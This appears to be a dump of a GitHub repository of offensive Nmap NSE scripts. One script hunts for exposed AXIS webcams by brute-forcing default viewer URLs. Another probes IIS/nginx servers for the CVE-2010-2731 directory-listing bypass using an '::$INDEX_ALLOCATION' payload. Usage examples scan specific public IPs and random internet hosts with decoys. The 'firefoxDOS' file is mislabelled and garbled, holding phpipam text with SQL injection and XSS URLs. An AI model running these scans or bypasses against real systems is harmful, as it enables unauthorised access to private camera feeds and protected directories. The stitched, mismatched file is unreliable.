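├── AXISwebcam-recon.nse ├── IIS-CVE-2010-2731.nse ├── README.md ├── Under Develop ├── firefoxDOS.nse ├── joomla-3_4_5.nse └── suid-shell.nse ├── abb-cve-2019-7226.nse ├── cisco-cve-2019-1937.nse ├── dlink-cve-2019-13101.nse ├── file-checker.nse ├── ms15-034.nse ├── phpipam.nse └── xeoon-itachitux.png
/AXISwebcam-recon.nse:
--------------------------------------------------------------------------------
---
-- Nmap NSE AXISwebcam-recon.nse - Version 1.10
-- Copy to: /usr/share/nmap/scripts/AXISwebcam-recon.nse
-- Update NSE database: sudo nmap --script-updatedb
-- execute: nmap --script-help AXISwebcam-recon.nse
-- Port(s) accepted: 80-86,92,8001,8080-8086,50090,55752-55758
---

-- SCRIPT BANNER DESCRIPTION --
description = [[

Module Author: r00t-3xp10it & Cleiton Pinheiro
NSE script to detect if target [ip]:[port][/url] its an AXIS Network Camera transmiting (live).
This script also allow is users to send a fake User-Agent in the tcp packet
and also allow is users to input a diferent uri= [/url] link to be scan, IF none uri= value its inputed, then
this script tests a List of AXIS default [/url's] available in our database to brute force the HTML TITLE tag.
'Remark: This nse script will NOT execute againts webcams found that require authentication logins'

Some Syntax examples:
nmap --script-help AXISwebcam-recon.nse
nmap -sV -Pn -p 80-86,92,8001,8080-8086,50090,55752-55754 --open --script AXISwebcam-recon.nse 216.99.115.136
nmap -sV -Pn -p 80-86,92,8080-8086 --open --script AXISwebcam-recon.nse --script-args "uri=/view/viewer_index.shtml" 217.78.137.43
nmap -sS -Pn -p 80-86,92,8080-8086 --script AXISwebcam-recon.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 50.93.227.204
nmap -sS -Pn -p 80,8080-8086 --open --script AXISwebcam-recon.nse --script-args "agent=Mozilla/5.0 (compatible),uri=/fd" 194.150.15.187
nmap -sS -v -Pn -n -T5 -iR 700 -p 80-86,92,8001,8080-8086,55752-55758 --open --script=http-headers.nse,AXISwebcam-recon.nse -D 65.49.82.3

]]


---
-- @usage
-- nmap --script-help AXISwebcam-recon.nse
-- nmap -sV -Pn -p 80-86,92,8080-8082 --open --script AXISwebcam-recon.nse 216.99.115.136
-- nmap -sV -Pn -p 80-86,92,8080-8082 --open --script AXISwebcam-recon.nse --script-args "uri=/view/viewer_index.shtml" 217.78.137.43
-- nmap -sS -Pn -p 80-86,92,8080-8082 --script AXISwebcam-recon.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 50.93.227.204
-- nmap -sS -Pn -p 80-86,92,8080-8082 --open --script AXISwebcam-recon.nse --script-args "agent=Mozilla/5.0 (compatible),uri=/" 194.150.15.187
-- @output
-- PORT STATE SERVICE VERSION
-- 8080/tcp open http Boa httpd
-- | AXISwebcam-recon:
-- | STATUS: AXIS WEBCAM FOUND
-- | TITLE: Live view - AXIS 211 Network Camera version 4.11
-- | WEBCAM ACCESS: http://216.99.115.136:8080/view/index.shtml
-- | Module Author: r00t-3xp10it & Cleiton Pinheiro
-- |_
-- @args AXISwebcam-recon.uri the path name to search (the unqualified "uri=" form also works). Default: /indexFrame.shtml
-- @args AXISwebcam-recon.agent User-agent to send in request - Default: iPhone,safari
---


author = "r00t-3xp10it & Cleiton Pinheiro"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"safe", "discovery"}


-- DEPENDENCIES (lua nse libraries) --
local stdnse = require ('stdnse') --> nse args usage and stdnse.sleep
local shortport = require "shortport"
local string = require "string"
local http = require "http"
local os = require "os" --> kept for compatibility; pacing now uses stdnse.sleep instead of os.execute("sleep")


-- SET VALUES COLOR TERMINAL USE IN FUNCTION --
local colors = {
  -- attributes
  reset = 0,
  clear = 0,
  bright = 1,
  dim = 2,
  underscore = 4,
  blink = 5,
  reverse = 7,
  hidden = 8,

  -- foreground
  black = 30,
  red = 31,
  green = 32,
  yellow = 33,
  blue = 34,
  magenta = 35,
  cyan = 36,
  white = 37,

  -- background
  onblack = 40,
  onred = 41,
  ongreen = 42,
  onyellow = 43,
  onblue = 44,
  onmagenta = 45,
  oncyan = 46,
  onwhite = 47,
}

-- FUNCTION SET COLOR TERMINAL --
-- Wrap an SGR attribute code into the escape sequence ESC[1;<code>m.
local function makecolor(value)
  return string.char(27) .. '[1;' .. tostring(value) .. 'm'
end

-- SET VALUES COLOR TERMINAL --
local green_color = makecolor(colors.green)
local white_color = makecolor(colors.white)
local error_color = makecolor(colors.red)
local reset_color = makecolor(colors.reset)
local yellow_color = makecolor(colors.yellow)

-- COLORING MADE BY MODULE --
local by_module = white_color.."r00t-3xp10it & Cleiton Pinheiro"..reset_color


-- Default AXIS landing pages tried, in order, when the requested uri answers 404.
local AXIS_URIS = {
  "/webcam.html", "/1/webcam.html", "/cam/Gcam.html", "/sub06/cam.php", "/home/homeS.html",
  "/webcam_code.php", "/view/view.shtml", "/indexFrame.shtml", "/view/index.shtml", "/view/index2.shtml",
  "/webcam/view.shtml", "/ViewerFrame.shtml", "/RecordFrame?Mode=", "/stadscam/Live95j.asp",
  "/livecamera/homeJ.html", "/MultiCameraFrame?Mode=", "/view/viewer_index.shtml", "/m/MultiCameraFrame?Mode=",
  "/visitor_center/i-cam.html", "/CgiStart?page=Single&Mode=", "/img/main.cgi?next_file=main.htm",
  "index.shtml", -- NOTE(review): no leading "/" unlike every other entry; verify this is intended
}

-- HTML <title> values known to identify AXIS cameras / video servers.
-- Compared with a plain (non-pattern) substring search, see action.
local AXIS_TITLES = {
  "TL-WR740N",
  "SNC-RZ30 HOME",
  "AXIS Video Server",
  "Live View / - AXIS",
  "Express6 Live Image",
  "ExpressXL Live Image",
  "Network Camera Lobby",
  "AXIS 2400 Video Server",
  "Network Camera TUCCAM1",
  "AXIS 243Q(2) Blade 4.45",
  "Network Camera Capitanía",
  "AXIS P5514 Network Camera",
  "AXIS Q1615 Network Camera",
  "AXIS P1357 Network Camera",
  "AXIS M5013 Network Camera",
  "AXIS M3026 Network Camera",
  "AXIS M1124 Network Camera",
  "Network Camera HVM-WebCam",
  "Network Camera Hwy285/cr43",
  "Login - Residential Gateway",
  "Axis 2420 Video Server 2.32",
  "AXIS Q6045-E Network Camera",
  "AXIS Q6044-E Network Camera",
  "Network Camera NetworkCamera",
  "AXIS P1435-LE Network Camera",
  "AXIS P1425-LE Network Camera",
  "Axis 2120 Network Camera 2.34",
  "Axis 2420 Network Camera 2.30",
  "Axis 2420 Network Camera 2.31",
  "Axis 2420 Network Camera 2.32",
  "Network Camera NetworkCamera1",
  "AXIS P1365 Mk II Network Camera",
  "AXIS F34 Network Camera 6.50.2.3",
  "AXIS 214 PTZ Network Camera 4.49",
  "Axis 2130 PTZ Network Camera 2.30",
  "Axis 2130 PTZ Network Camera 2.31",
  "Axis 2130 PTZ Network Camera 2.32",
  "AXIS P5635-E Mk II Network Camera",
  "AXIS Q7401 Video Encoder 5.51.5.1",
  "AXIS Q6045-E Mk II Network Camera",
  "AXIS P1353 Network Camera 6.50.2.3",
  "AXIS M3004 Network Camera 5.51.5.1",
  "AXIS M1145-L Network Camera 6.50.3",
  "AXIS M2025-LE Network Camera 8.50.1",
  "Live view / - AXIS 205 version 4.03",
  "Live view - AXIS 240Q Video Server",
  "Live view - AXIS 221 Network Camera",
  "Live view - AXIS 211 Network Camera",
  "AXIS Q1765-LE Network Camera 5.55.2.3",
  "Live view - AXIS P1354 Network Camera",
  "Live view - AXIS P1344 Network Camera",
  "Live view - AXIS M1114 Network Camera",
  "Live view - AXIS M1103 Network Camera",
  "Live view - AXIS M1025 Network Camera",
  "AXIS P1354 Fixed Network Camera 6.50.3",
  "AXIS P1354 Fixed Network Camera 5.60.1",
  "AXIS V5914 PTZ Network Camera 5.75.1.11",
  "Live view - AXIS P5534-E Network Camera",
  "Live view - AXIS 215 PTZ Network Camera",
  "Live view - AXIS 214 PTZ Network Camera",
  "Live view - AXIS 213 PTZ Network Camera",
  "AXIS P5534 PTZ Dome Network Camera 5.51.5",
  "AXIS Q6034-E PTZ Dome Network Camera 5.41.4",
  "AXIS P3354 Fixed Dome Network Camera 5.40.17",
  "AXIS Q6042-E PTZ Dome Network Camera 5.70.1.4",
  "AXIS Q3505 Fixed Dome Network Camera 6.30.1.1",
  "Live view - AXIS 206M Network Camera version 4.11",
  "Live view - AXIS 211 Network Camera version 4.11",
  "Live view - AXIS 211 Network Camera version 4.10",
  "Live view / - AXIS 205 Network Camera version 4.04",
  "Live view / - AXIS 205 Network Camera version 4.05",
  "AXIS P5635-E Mk II PTZ Dome Network Camera 8.40.2.2",
  "Live view / - AXIS 205 Network Camera version 4.05.1",
  "Live view - AXIS 213 PTZ Network Camera version 4.12",
}


-- THE RULE SECTION --
-- portrule = shortport.http --> Scan only the selected ports/proto/service_name in open state
portrule = shortport.port_or_service({80, 81, 82, 83, 84, 85, 86, 92, 8001, 8080, 8081, 8082, 8083, 50090, 55752, 55754}, "http, http-proxy", "tcp", "open")


-- THE ACTION SECTION --
-- Probe host:port for an AXIS camera page: locate a page that answers 200
-- (the uri= argument or the first hit in AXIS_URIS), fetch it with the
-- configured headers and compare its <title> against AXIS_TITLES.
-- Returns the "NONE AXIS WEBCAM FOUND" banner when nothing matched and nil
-- otherwise; progress is printed as the script runs.
-- NOTE(review): print() writes straight to nmap's stdout and bypasses the
-- script output (-oX/-oG); the original behaviour is preserved here.
-- Changes from the original: stdnse.sleep replaces os.execute("sleep"),
-- the loop counters are local (the globals leaked between targets so the
-- "end of list" checks never fired on the second host), a nil status no
-- longer crashes string concatenation, a page without <title> is reported
-- as not found instead of raising, and titles are matched as plain text
-- (several contain pattern magic characters such as "(" and "-").
action = function(host, port)
  print(yellow_color.."Brute forcing Network Camera URL (uri)"..reset_color)
  stdnse.sleep(0.5)

  -- Request headers sent with every probe; agent= overrides the User-Agent
  local options = {header={}}
  options['header']['User-Agent'] = stdnse.get_script_args(SCRIPT_NAME..".agent") or "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25"
  options['header']['Accept-Language'] = "en-GB,en;q=0.8,sv"
  options['header']['Cache-Control'] = "no-store" --> ask the server not to cache the response

  -- uri= script argument, or the default landing page
  local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/indexFrame.shtml"

  -- Check the requested uri; tostring() keeps a nil status (failed request) printable
  local check_uri = http.get(host, port, uri, options)
  local status = check_uri.status
  if status == 401 then
    print("|["..error_color..tostring(status)..reset_color.."] => http://"..host.ip..":"..port.number..uri..error_color.." (AUTH LOGIN FOUND)"..reset_color)
  elseif status == 404 then
    print("|["..error_color..tostring(status)..reset_color.."] "..host.ip.." => "..uri)
    -- Requested uri is absent: walk the default list and keep the first 200
    local found = nil
    for _, candidate in ipairs(AXIS_URIS) do
      local res = http.get(host, port, candidate, options)
      if res.status == 200 then
        print("|["..green_color..tostring(res.status)..reset_color.."] "..host.ip.." => "..candidate)
        found = candidate
        break
      end
      print("|["..error_color..tostring(res.status)..reset_color.."] "..host.ip.." => "..candidate)
      stdnse.sleep(0.5)
    end
    if not found then
      print("|[ABORT]: "..error_color.."None Match (uri) has been found in AXISwebcam-recon database."..reset_color)
      print("|[NOTES]: "..yellow_color.."--script-args uri=/CgiStart?page=Single&Mode=Motion&Language=1"..reset_color)
      print("|_")
      stdnse.sleep(1)
      return
    end
    uri = found
  elseif status == 400 or status == 403 or status == 405 or status == 500 or status == 502 or status == 503 or status == 307 or status == 302 or status == 301 or status == nil then
    -- Error / redirect codes and a failed request end the probe here
    print("|["..error_color..tostring(status)..reset_color.."] "..host.ip.." => "..uri)
    return
  else
    print("|["..green_color..tostring(status)..reset_color.."] "..host.ip.." => "..uri)
  end
  print(" _")

  -- Fetch the selected page and compare its <title> with the known AXIS titles
  local response = http.get(host, port, uri, options)
  if response.status ~= 200 then
    return
  end
  local title = response.body and string.match(response.body, "<[Tt][Ii][Tt][Ll][Ee][^>]*>([^<]*)")
  print("| "..yellow_color.."AXISwebcam-recon"..reset_color..":")
  if title then
    for _, known in ipairs(AXIS_TITLES) do
      -- plain find (4th arg true): titles carry pattern magic characters
      if title == known or string.find(title, known, 1, true) then
        print("|\n| STATUS: "..green_color.."AXIS WEBCAM FOUND"..reset_color.."\n| TITLE: "..green_color..known..reset_color.."\n| WEBCAM ACCESS: "..green_color.."http://"..host.ip..":"..port.number..uri..reset_color.."\n| Module Author: "..by_module.."\n|_")
        return
      end
      print("| TESTING: "..known)
      stdnse.sleep(0.5)
    end
  end
  print("|_")
  return "\n STATUS: NONE AXIS WEBCAM FOUND\n Module Author: r00t-3xp10it & Cleiton Pinheiro\n\n"
end
--------------------------------------------------------------------------------
/IIS-CVE-2010-2731.nse:
--------------------------------------------------------------------------------
---
-- Nmap NSE IIS-CVE-2010-2731.nse - Version 1.8
-- Copy to: /usr/share/nmap/scripts/IIS-CVE-2010-2731.nse
-- Update NSE database: sudo nmap --script-updatedb
-- execute: nmap --script-help IIS-CVE-2010-2731.nse
-- Port(s) accepted by this nse: 80-86,8001,8080-8086
---

-- SCRIPT BANNER DESCRIPTION --
description = [[

Module Author: r00t-3xp10it
NSE script to detect if target [ip]:[port][/url] its affected by CVE-2010-2731 (Directory Listing Denied)
This module bypasses Directory Listing protections for Internet Information Services (microsoft-IIS/5.1 to 7.5
& nginx 0.7.52 to 1.3.0). By appending a payload to the end of the directory name in a request, it is possible
to access webserver protected directorys. 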
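nse arguments available: verbose=true (automatic display target body)
agent=User-Agent (User-Agent string to send in probes) | uri=directory to scan (If none uri its inputed then this
script tests a List of default [/url's] available in our database to brute force folder names). This nse script
will auto-execute if the categorie it belongs its called (eg. --script=vuln) <-- run all vuln categorie scripts.

Some Syntax examples:
nmap --script-help IIS-CVE-2010-2731.nse
nmap -sV -v -Pn -n -p 80-86,8001,8080-8086 --open --script=vuln 103.59.101.83
nmap -sV -Pn -n -p 80-86,8001,8080-8086 --open --script IIS-CVE-2010-2731.nse 223.7.230.27
nmap -sV -Pn -n -p 80-86,8001,8080-8086 --open --script IIS-CVE-2010-2731.nse --script-args "uri=/css" 223.7.230.27
nmap -sS -Pn -p 80 --open --script IIS-CVE-2010-2731.nse --script-args "agent=Apache-HttpClient/4.0.3,verbose=true" 80.32.135.112
nmap -sS -v -Pn -n -T4 -iR 700 -p 80,8001,8080-8086 --open --script=banner.nse,http-headers.nse,IIS-CVE-2010-2731.nse -D 65.49.82.3

]]

---
-- @usage
-- nmap --script-help IIS-CVE-2010-2731.nse
-- nmap -sV -Pn -n -p 80-86,8001,8080-8086 --open --script IIS-CVE-2010-2731.nse 223.7.230.27
-- nmap -sV -Pn -n -p 80-86,8001,8080-8086 --open --script IIS-CVE-2010-2731.nse --script-args "uri=/css" 223.7.230.27
-- nmap -sS -Pn -p 80 --open --script IIS-CVE-2010-2731.nse --script-args "agent=Apache-HttpClient/4.0.3,verbose=true" 223.7.230.27
-- nmap -sS -v -Pn -n -T5 -iR 700 -O -p 80,8001,8080-8086 --open --script=banner.nse,http-headers.nse,IIS-CVE-2010-2731.nse -D 65.49.82.3
-- @output
-- PORT STATE SERVICE VERSION
-- 80/tcp open http
-- | IIS-CVE-2010-2731:
-- | STATUS: POSSIBLE BYPASS - Directory Listing Denied
-- | URL ACCESS: http://223.7.230.27:80/images::$INDEX_ALLOCATION/
-- | Module Author: r00t-3xp10it (ssa redteam)
-- |_
-- @args IIS-CVE-2010-2731.uri the path name to search (the unqualified "uri=" form also works). Default: /0/
-- @args IIS-CVE-2010-2731.agent User-agent to send in request - Default: iPhone,safari
-- @args IIS-CVE-2010-2731.verbose Automatic display target webpage body - Default: false
---


author = "r00t-3xp10it (ssa redteam)"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"safe", "vuln"}


-- DEPENDENCIES (lua nse libraries) --
local stdnse = require ('stdnse') --> nse args usage and stdnse.sleep
local shortport = require "shortport"
local string = require "string"
local table = require "table"
local http = require "http"
local nmap = require "nmap"
local os = require "os" --> kept for compatibility; pacing now uses stdnse.sleep instead of os.execute("sleep")


-- SET VALUES COLOR TERMINAL USE IN FUNCTION --
local colors = {
  -- attributes
  reset = 0,
  clear = 0,
  bright = 1,
  dim = 2,
  underscore = 4,
  blink = 5,
  reverse = 7,
  hidden = 8,

  -- foreground
  black = 30,
  red = 31,
  green = 32,
  yellow = 33,
  blue = 34,
  magenta = 35,
  cyan = 36,
  white = 37,

  -- background
  onblack = 40,
  onred = 41,
  ongreen = 42,
  onyellow = 43,
  onblue = 44,
  onmagenta = 45,
  oncyan = 46,
  onwhite = 47,
}

-- FUNCTION SET COLOR TERMINAL --
-- Wrap an SGR attribute code into the escape sequence ESC[1;<code>m.
local function makecolor(value)
  return string.char(27) .. '[1;' .. tostring(value) .. 'm'
end
-- SET VALUES COLOR TERMINAL --
local green_color = makecolor(colors.green)
local white_color = makecolor(colors.white)
local error_color = makecolor(colors.red)
local reset_color = makecolor(colors.reset)
local yellow_color = makecolor(colors.yellow)
-- COLORING MADE BY MODULE --
local by_module = white_color.."r00t-3xp10it (ssa redteam)"..reset_color


-- Raw "Server:" header lines treated as candidate versions for CVE-2010-2731
-- (compared for exact equality against the target's raw header lines).
local VULN_SERVER_HEADERS = {
  "Server: nginx/0.7.52", "Server: nginx/1.0.0", "Server: nginx/1.1.0", "Server: nginx/1.2.0", "Server: nginx/1.3.0",
  "Server: Microsoft-IIS/5.1", "Server: Microsoft-IIS/6.0", "Server: Microsoft-IIS/6.1", "Server: Microsoft-IIS/6.2",
  "Server: Microsoft-IIS/6.3", "Server: Microsoft-IIS/6.4", "Server: Microsoft-IIS/6.5", "Server: Microsoft-IIS/6.6",
  "Server: Microsoft-IIS/6.7", "Server: Microsoft-IIS/6.8", "Server: Microsoft-IIS/6.9", "Server: Microsoft-IIS/7.0",
  "Server: Microsoft-IIS/7.1", "Server: Microsoft-IIS/7.2", "Server: Microsoft-IIS/7.3", "Server: Microsoft-IIS/7.4",
  "Server: Microsoft-IIS/7.5", "Server: Apache/2.4.6 (CentOS) PHP/7.1.32",
}

-- Directory names probed when the requested uri answers 404 (68 entries).
local DIR_LIST = {
  "/etc/", "/Mem/", "/img/", "/css/", "/ASP/", "/imgs/", "/.svn/", "/main/", "/home/", "/Data/",
  "/USER/", "/Mail/", "/News/", "/Site/", "/Page/", "/fotos/", "/forum/", "/Excel/", "/login/", "/admin/",
  "/Views/", "/stats/", "/Pages/", "/Album/", "/static/", "/hidden/", "/camera/", "/Albums/", "/admin1/", "/Survey/",
  "/Office/", "/PSUser/", "/Citrix/", "/Common/", "/images/", "/gallery/", "/account/", "/Sources/", "/Example/", "/History/",
  "/archive/", "/database/", "/archives/", "/Plug-Ins/", "/AdminWeb/", "/documents/", "/UserFiles/", "/adminRoot/", "/ISSamples/", "/FCKeditor/",
  "/Templates/", "/adminuser/", "/adsamples/", "/Web_Store/", "/admin-serv/", "/CreditCard/", "/adminmysql/", "/Statistics/", "/ProductCart/", "/addressbook/",
  "/addressBook/", "/AdvWebAdmin/", "/DomainFiles/", "/HBTemplates/", "/administator/", "/Administration/", "/CustomerService/", "/adminphpmyadmin/",
}

-- Suffixes appended to a directory name to form the CVE-2010-2731 probe path.
local PAYLOAD_NO_TRAILING_SLASH = ":$i30:$INDEX_ALLOCATION/"
local PAYLOAD_TRAILING_SLASH = "::$INDEX_ALLOCATION/"

-- Build the probe path for a directory name: a name with no trailing "/" gets
-- PAYLOAD_NO_TRAILING_SLASH appended, one ending in "/" has that slash
-- replaced by PAYLOAD_TRAILING_SLASH (the original duplicated this twice).
local function with_payload(path)
  if string.sub(path, -1) ~= "/" then
    return path..PAYLOAD_NO_TRAILING_SLASH
  end
  return path:sub(1, -2)..PAYLOAD_TRAILING_SLASH
end


-- THE RULE SECTION --
-- portrule = shortport.http --> Scan only the selected ports/proto/service_name in open state
portrule = shortport.port_or_service({80, 81, 82, 83, 84, 85, 86, 8001, 8080, 8081, 8082, 8083, 8084, 8085, 8086}, "http, http-proxy", "tcp", "open")


-- THE ACTION SECTION --
-- 1. compare the target's raw header lines with VULN_SERVER_HEADERS and stop
--    when none matches; 2. pick a "Directory Listing Denied" directory (the
--    uri= argument, or the last protected entry of DIR_LIST when the argument
--    answers 404); 3. request that directory with the payload suffix and
--    print the verdict. Always returns nil; all output goes through print().
-- NOTE(review): print() bypasses nmap's structured script output; kept as in
-- the original.
-- Changes from the original: stdnse.sleep replaces os.execute("sleep"), the
-- script-level globals (uri, disp, tbl, limmit, ...) are locals, a nil
-- status/body no longer raises during concatenation or :match(), and the
-- directory scan always proceeds to the payload request. The original
-- compared a global counter with the hard-coded 69, which the 68-entry list
-- never reached on the first target and which leaked across targets.
action = function(host, port)
  print(yellow_color.."IIS-CVE-2010-2731:"..reset_color)
  print("| "..yellow_color.."Checking exploit compatibility."..reset_color)

  local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/0/"
  local disp = stdnse.get_script_args(SCRIPT_NAME..".verbose") or "false"

  -- Capture the target header to compare against the vulnerable versions list
  local result = http.get(host, port, "/")
  local rawheader = result.rawheader or {} --> nil when the request failed
  if disp == "true" then
    print("")
    for _, header_line in ipairs(rawheader) do
      print(header_line)
    end
  end

  -- First raw header line equal to one of the known banners
  local target = "false"
  for _, known in ipairs(VULN_SERVER_HEADERS) do
    for _, header_line in ipairs(rawheader) do
      if header_line == known then
        target = header_line
        break
      end
    end
    if target ~= "false" then
      break
    end
  end

  -- Exit if no compatible server version was found
  if target == "false" then
    print("| ["..error_color.."404"..reset_color.."] Non Compatible Server version detected.")
    print("|\n| STATUS: "..error_color..host.ip.." - Does not seems vuln to CVE-2010-2731"..reset_color.."\n| Module Author: "..by_module.."\n|_")
    return
  end
  print("| ["..green_color.."200"..reset_color.."] "..target)

  -- Request headers used by every following probe; agent= overrides the User-Agent
  local options = {header={}}
  options['header']['User-Agent'] = stdnse.get_script_args(SCRIPT_NAME..".agent") or "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1"
  options['header']['Accept-Language'] = "en-GB,en;q=0.8,sv"
  options['header']['Cache-Control'] = "no-store" --> ask the server not to cache the response

  -- Locate the directory to probe: the given uri, or a scan of DIR_LIST on 404
  local check_uri = http.get(host, port, uri, options)
  local status = check_uri.status
  local body = check_uri.body or "" --> body is nil on failed requests; keep :match() safe
  -- NOTE(review): 1003 is not an HTTP status code; presumably an nse-internal value — confirm
  if status == 1003 or body:match("Direct IP access not allowed") then
    print("| ["..error_color..tostring(status)..reset_color.."] => http://"..host.ip..":"..port.number..error_color.." (Direct IP access not allowed)"..reset_color.."\n|_")
  elseif status == 404 then
    print("| "..yellow_color.."Scanning Directory Names."..reset_color)
    print("| ["..error_color..tostring(status)..reset_color.."] "..host.ip.." => "..uri)
    for _, candidate in ipairs(DIR_LIST) do
      local res = http.get(host, port, candidate, options)
      local res_body = res.body or ""
      -- Lua precedence: 403 alone, or 401 together with the body marker (parenthesised for clarity)
      if res.status == 403 or (res.status == 401 and res_body:match("Directory Listing Denied")) then
        print("| ["..green_color..tostring(res.status)..reset_color.."] "..host.ip.." => "..candidate..green_color.." (found: protected)"..reset_color)
        stdnse.sleep(0.2)
        uri = with_payload(candidate) --> the last protected directory found is the one probed below
        if disp == "true" then
          print("\n"..res_body.."\n")
        end
      else
        print("| ["..error_color.."404"..reset_color.."] "..host.ip.." => "..candidate)
        stdnse.sleep(0.2)
      end
    end
    -- End of the list: continue to the payload request (uri stays "/0/" when nothing was protected)
    print("|_")
    stdnse.sleep(1)
  elseif status == 400 or status == 405 or status == 500 or status == 502 or status == 503 or status == 307 or status == 302 or status == 301 or status == nil then
    -- Error / redirect codes and a failed request end the probe here
    print("| ["..error_color..tostring(status)..reset_color.."] "..host.ip.." => "..uri)
    return
  elseif status == 403 and body:match("Directory Listing Denied") then
    print("| ["..green_color..tostring(status)..reset_color.."] "..host.ip.." => "..uri)
    uri = with_payload(uri)
  end

  -- Send the payload to the selected uri (last directory found)
  print("|\n| ["..green_color.."200"..reset_color.."] "..yellow_color.."Sending tcp packet with payload attached."..reset_color)
  stdnse.sleep(1)
  if uri == "/0/" then
    print("| STATUS: "..error_color.."None Match has been found in IIS-CVE-2010-2731 database."..reset_color.."\n| URL ACCESS:"..error_color.." http://"..host.ip..":"..port.number..reset_color.."\n| Module Author: "..by_module.."\n|_")
    return
  end

  -- Classify the response to the payload request; one print covers every verdict
  local bypass = http.get(host, port, uri, options)
  local bypass_status = bypass.status
  local bypass_body = bypass.body or ""
  local url = "http://"..host.ip..":"..port.number..uri
  local verdict, colour
  if bypass_status == 1003 or bypass_body:match("Direct IP access not allowed") then
    verdict, colour = "ERROR - Direct IP access not allowed", error_color
  elseif bypass_status == 501 or bypass_body:match("Not Implemented") then
    verdict, colour = "ERROR - Not Implemented", error_color
  elseif bypass_status == 404 then
    verdict, colour = "POSSIBLE BYPASS - Directory Listing Denied", green_color
  elseif bypass_status == 200 then
    verdict, colour = "FOUND BYPASS - Directory Listing Denied", green_color
  elseif bypass_status == 403 or bypass_body:match("Request denied by WatchGuard Firewall.") then
    verdict, colour = "REQUEST DENIED - Directory Listing Denied ("..yellow_color.."WatchGuard"..error_color..")", error_color
  else
    verdict, colour = host.ip.." - Does not seem to by vuln to CVE-2010-2731", error_color
  end
  print("| STATUS: "..colour..verdict..reset_color.."\n| URL ACCESS:"..colour.." "..url..reset_color.."\n| Module Author: "..by_module.."\n|_")
  stdnse.sleep(2)
  if disp == "true" then
    print("\n"..bypass_body.."\n")
  end
end
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# nmap-nse-modules
my collection of nmap nse modules

# Description
this working directory contains different nmap nse modules
written by me to be of assistance in post-exploitation common tasks.

# Install
1) Download module from github
2) edit module to read the description
3) port module to nmap nse database
4) update nse database: `nmap --script-updatedb`

# Please read my 'WIKI' for further information.
--------------------------------------------------------------------------------
/Under Develop/firefoxDOS.nse:
--------------------------------------------------------------------------------
---
-- Nmap firefoxDOS - Version 1.6
-- Copy script to: /usr/share/nmap/scripts/phpipam.nse
-- Update NSE database: sudo nmap --script-updatedb
-- executing: nmap --script-help phpipam.nse
-- executing: nmap -sV -Pn -p 80 --open --script phpipam.nse
-- executing: nmap -sV -Pn -p 80 --open --reason --script phpipam.nse --script-args uri=/phpipam.php
-- executing: nmap -sV -Pn -p 80 --script phpipam.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)"
---


-- SCRIPT BANNER DESCRIPTION --
description = [[

Module Author: r00t-3xp10it
Vuln discover: Saeed reza
NSE script to detect multiple vulnerabilitys in phpipam (1.2.1 & 1.1.010) versions
of open-source web IP address management application (IPAM). 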
by default phpipam.nse 19 | searches for phpipam.html on target webserver, If target respondes 200 OK then my 20 | script will verify the version installed and If the 2 condictions are true it will 21 | display a vulnerable output. 22 | 23 | 24 | Some Syntax examples: 25 | nmap --script-help phpipam.nse 26 | nmap -sV -Pn -p 80 --open --script phpipam.nse 27 | nmap -sV -Pn -p 80 --open --reason --script phpipam.nse 192.168.1.0/24 28 | nmap -sV -Pn -p 80 --open --script phpipam.nse --script-args uri=/phpipam.php 29 | nmap -sV -Pn -p 80 --open --script phpipam.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 30 | nmap -sV -T4 -iR 400 -Pn -p 80 --open --reason --script phpipam.nse --script-args uri=/phpipam/ -oN IPAMreport.log 31 | 32 | ]] 33 | 34 | --- 35 | -- @usage 36 | -- nmap --script-help phpipam.nse 37 | -- nmap -sV -Pn -p 80 --open --script phpipam.nse 38 | -- nmap -sV -Pn -p 80 --open --reason --script phpipam.nse 192.168.1.0/24 39 | -- nmap -sV -Pn -p 80 --open --script phpipam.nse --script-args uri=/phpipam.php 40 | -- nmap -sV -Pn -p 80 --open --script phpipam.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 41 | -- nmap -sV -T4 -iR 400 -Pn -p 80 --open --reason --script phpipam.nse --script-args uri=/phpipam/ -oN IPAMreport.log 42 | -- @output 43 | -- PORT STATE SERVICE VERSION 44 | -- 80/tcp open http phpipam 1.2.1 45 | -- | phpipam: 46 | -- | STATUS: VULNERABLE 47 | -- | VERSION: 1.2.1 (likelly exploitable) 48 | -- | Disclosure date: 28 set 2016 49 | -- | Vuln discover: Saeed reza 50 | -- | Module Author: r00t-3xp10it 51 | -- | 52 | -- | Description: 53 | -- | phpipam is an open-source web IP address management application, its goal is to provide light 54 | -- | modern and useful IP address management. It is php-based application with MySQL database backend, 55 | -- | using jQuery libraries, ajax and some HTML5/CSS3 features. 
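-- | [SQLI GET] => http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a&sPage=50'
-- | [XSS POST] => http://[Site]/phpipam/app/admin/widgets/edit.php/wid=1>&action=edit
-- |
-- | References:
-- | Vendor: http://phpipam.net/
-- | Vuln Discover: http://0day.today/exploit/25375
-- | Vuln Discover: https://www.exploit-db.com/exploits/39171/
-- | Module Author: https://sourceforge.net/u/peterubuntu10/profile/
-- |_
-- @args payload.uri the path name to search. Default: /phpipam.html
-- @args payload.agent User-agent to send in request - Default: iPhone,safari
---

author = "r00t-3xp10it"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"safe", "discovery", "vuln"}



-- DEPENDENCIES (lua nse libraries) --
local stdnse = require ('stdnse') --> required to use nse arguments
local shortport = require "shortport"
local string = require "string"
local http = require "http"



-- THE RULE SECTION --
-- portrule = shortport.http --> updated to scan only the selected ports/proto/services
portrule = shortport.port_or_service({80, 443}, "http, https", "tcp", "open")
-- local uri = "/phpipam.html" --> updated to use script @args payload.uri
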